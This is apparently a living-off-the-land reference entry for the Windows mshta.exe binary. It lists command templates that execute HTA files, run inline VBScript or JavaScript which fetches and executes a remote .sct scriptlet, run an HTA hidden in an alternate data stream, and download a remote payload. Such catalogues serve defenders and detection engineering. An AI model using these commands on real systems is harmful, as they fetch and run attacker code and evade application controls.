Used by Windows to execute html applications. (.hta)
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
mshta.exe {PATH:.hta}
Executes VBScript supplied as a command line argument.
mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))
Executes JavaScript supplied as a command line argument.
mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
mshta.exe "{PATH_ABSOLUTE}:file.hta"
It will download a remote payload and place it in INetCache.
mshta.exe {REMOTEURL}